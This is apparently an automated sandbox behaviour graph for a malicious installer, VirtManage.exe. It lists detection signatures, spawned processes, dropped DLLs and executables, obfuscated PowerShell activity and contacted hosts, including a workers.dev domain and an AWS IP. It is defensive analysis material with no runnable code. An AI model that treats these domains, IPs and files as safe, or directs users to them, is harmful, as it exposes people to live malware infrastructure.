behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1632487 Sample: VirtManage.exe Startdate: 08/03/2025 Architecture: WINDOWS Score: 42 89 ec2-52-14-160-176.us-east-2.compute.amazonaws.com 2->89 91 cdn-app-web2.lenete5970.workers.dev 2->91 99 Antivirus detection for dropped file 2->99 101 Multi AV Scanner detection for dropped file 2->101 103 .NET source code contains a domain name check 2->103 105 Sigma detected: Dot net compiler compiles file from suspicious location 2->105 10 VirtManage.exe 2 36 2->10         started        13 oleview.exe 2->13         started        16 msiexec.exe 2->16         started        18 svchost.exe 2->18         started        signatures3 process4 dnsIp5 81 C:\Users\user\AppData\Local\...\nsis7z.dll, PE32 10->81 dropped 83 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 10->83 dropped 85 C:\ProgramData\Microsoft\...\zlib1.dll, PE32 10->85 dropped 87 9 other malicious files 10->87 dropped 21 oleview.exe 10->21         started        24 7za.exe 6 10->24         started        27 msiexec.exe 11 10->27         started        33 9 other processes 10->33 119 Suspicious powershell command line found 13->119 121 Obfuscated command line found 13->121 29 powershell.exe 13->29         started        31 msiexec.exe 1 1 16->31         started        93 127.0.0.1 unknown unknown 18->93 file6 signatures7 process8 file9 107 Suspicious powershell command line found 21->107 109 Obfuscated command line found 21->109 111 Encrypted powershell cmdline option found 21->111 35 powershell.exe 21->35         started        67 C:\ProgramData\Microsoft\...\oleview.exe, PE32+ 24->67 dropped 69 C:\ProgramData\Microsoft\...\aclui.dll, PE32+ 24->69 dropped 71 C:\ProgramData\Microsoft\...\aclui-2.dll, PE32+ 24->71 dropped 40 conhost.exe 24->40         started        73 C:\Users\user\AppData\Local\...\MSI3323.tmp, PE32 27->73 dropped 75 C:\Users\user\AppData\Local\...\MSI32C4.tmp, PE32 27->75 dropped 113 Loading BitLocker PowerShell Module 29->113 42 conhost.exe 29->42         started        44 WmiPrvSE.exe 31->44         started        77 C:\ProgramData\Microsoft\...\7za.exe, PE32+ 33->77 dropped 79 C:\ProgramData\Microsoft\...\7za.dll, PE32+ 33->79 dropped 46 w32tm.exe 1 33->46         started        48 conhost.exe 33->48         started        50 conhost.exe 33->50         started        52 7 other processes 33->52 signatures10 process11 dnsIp12 95 cdn-app-web2.lenete5970.workers.dev 104.21.62.135, 443, 49694, 49695 CLOUDFLARENETUS United States 35->95 63 C:\Users\user\AppData\...\b0okydtw.cmdline, Unicode 35->63 dropped 115 Uses whoami command line tool to query computer and username 35->115 117 Loading BitLocker PowerShell Module 35->117 54 csc.exe 35->54         started        57 conhost.exe 35->57         started        59 whoami.exe 35->59         started        97 ec2-52-14-160-176.us-east-2.compute.amazonaws.com 52.14.160.176, 123 AMAZON-02US United States 46->97 file13 signatures14 process15 file16 65 C:\Users\user\AppData\Local\...\b0okydtw.dll, PE32 54->65 dropped 61 cvtres.exe 54->61         started        process17

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.